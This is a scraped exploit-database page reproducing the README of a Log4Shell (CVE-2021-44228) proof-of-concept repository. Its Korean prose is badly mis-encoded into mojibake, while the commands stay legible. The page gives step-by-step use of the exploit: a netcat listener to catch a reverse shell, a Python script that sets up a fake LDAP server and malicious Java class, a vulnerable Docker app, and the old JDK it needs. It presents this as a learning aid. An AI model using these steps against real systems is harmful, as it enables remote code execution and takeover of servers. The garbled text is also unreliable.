## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YANGHYPERDATA-LOGJ4_POCSHELL_CVE-2021-44228
# log4j-shell-poc
μ΅κ·Ό λ°κ²¬λ CVE-2021-44228 μ·¨μ½μ μ λν κ°λ
μ¦λͺ
μ
λλ€.
μ΅κ·Ό log4jμμ μλ‘μ΄ μ·¨μ½μ μ΄ λ°κ²¬λμμ΅λλ€. log4jλ elasticsearch, minecraft λ° κΈ°ν μ¬λ¬ κ³³μμ λ§€μ° λ리 μ¬μ©λλ Java λ‘κΉ
λΌμ΄λΈλ¬λ¦¬μ
λλ€.
μ΄ μ μ₯μμλ μ·¨μ½ν μμ μ ν리μΌμ΄μ
κ³Ό μ΄μ λν κ°λ
μ¦λͺ
(POC) μ΅μ€νλ‘μμ΄ ν¬ν¨λμ΄ μμ΅λλ€.
## κ°λ
μ¦λͺ
(POC)
PoCλ‘ νλ‘μΈμ€λ₯Ό μλννλ Python νμΌμ΄ μμ΅λλ€.
#### μꡬ μ¬ν:
root@kitploit:~
pip install -r requirements.txt
#### μ¬μ©λ²:
* μλ°©ν₯ μ
Έ μ°κ²°μ μλ½νλλ‘ netcat 리μ€λλ₯Ό μμν©λλ€.
root@kitploit:~
nc -lvnp 9001
* μ΅μ€νλ‘μμ μ€νν©λλ€.
**μ°Έκ³ :** μ΄ μμ
μ΄ μλνλ €λ©΄ μΆμΆλ Java μμΉ΄μ΄λΈμ μ΄λ¦μ΄ `jdk1.8.0_20`μ΄μ΄μΌ νλ©°, κ°μ λλ ν°λ¦¬μ μμ΄μΌ ν©λλ€.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[+] Exploit java class created success
[+] Setting up fake LDAP server
Listening on 0.0.0.0:1389
μ΄ μ€ν¬λ¦½νΈλ HTTP μλ²μ LDAP μλ²λ₯Ό μλμΌλ‘ μ€μ νκ³ , μ·¨μ½ν λ§€κ°λ³μμ λΆμ¬λ£μ μ μλ νμ΄λ‘λλ μμ±ν©λλ€. μ΄ν λͺ¨λ κ²μ΄ μ μμ μΌλ‘ μ§νλμλ€λ©΄ lportμμ μ
Έμ μ»μ μ μμ΅λλ€.
## μ·¨μ½ν μ ν리μΌμ΄μ
μ·¨μ½ν μΉ μ ν리μΌμ΄μ
μ΄ ν¬ν¨λ Dockerfileμ΄ μμ΅λλ€. μλ λ¨κ³μ λ°λΌ μ¬μ©ν μ μμ΅λλ€:
root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc
μ€νλλ©΄ localhost:8080μμ μ κ·Όν μ μμ΅λλ€.
## Java λ²μ μ»κΈ°.
Oracleμ λ€ννλ μ΄μ μ λͺ¨λ Java λ²μ μ© μμΉ΄μ΄λΈλ₯Ό μ 곡ν©λλ€:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
μλλ‘ μ€ν¬λ‘€νμ¬ `8u20`μΌλ‘ μ΄λν ν, μ΄μ 체μ μ νλμ¨μ΄μ λ§λ νμΌμ λ€μ΄λ‘λνμΈμ. 
**μ°Έκ³ :** ν¨ν€μ§λ₯Ό λ€μ΄λ‘λνλ €λ©΄ κ³μ μ λ§λ€μ΄μΌ ν©λλ€.
μμΉ΄μ΄λΈλ₯Ό λ€μ΄λ‘λνμ¬ μμΆμ νΌ ν, `jdk1.8.0_20/bin`μμ `java` λ° λͺ κ°μ§ κ΄λ ¨ λ°μ΄λ리λ₯Ό μ°Ύμ μ μμ΅λλ€.
**μ°Έκ³ :** μ λλ‘ μλνλ €λ©΄ jdk ν΄λλ₯Ό μ΄ μ μ₯μμ κ°μ μ΄λ¦μΌλ‘ μμΆ ν΄μ ν΄μΌ ν©λλ€.
root@kitploit:~
β― tar -xf jdk-8u20-linux-x64.tar.gz
β― ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
## λ©΄μ±
μ‘°ν
μ΄ μ μ₯μλ CVE-2021-44228μ λν μν΄λ¦ μ΅μ€νλ‘μμ μ 곡νκΈ° μν κ²μ΄ μλλλ€. μ΄ νλ‘μ νΈμ λͺ©μ μ μ¬λλ€μ΄ μ΄ μ·¨μ½μ μ λν΄ λ°°μ°κ³ , μμ μ μ ν리μΌμ΄μ
μ ν
μ€νΈν μ μλλ‘ λλ κ²μ
λλ€ (λ¨, μ΄ λͺ©μ μλ λ λμ μ ν리μΌμ΄μ
μ΄ μμ΅λλ€, μ: https://log4shell.tools/).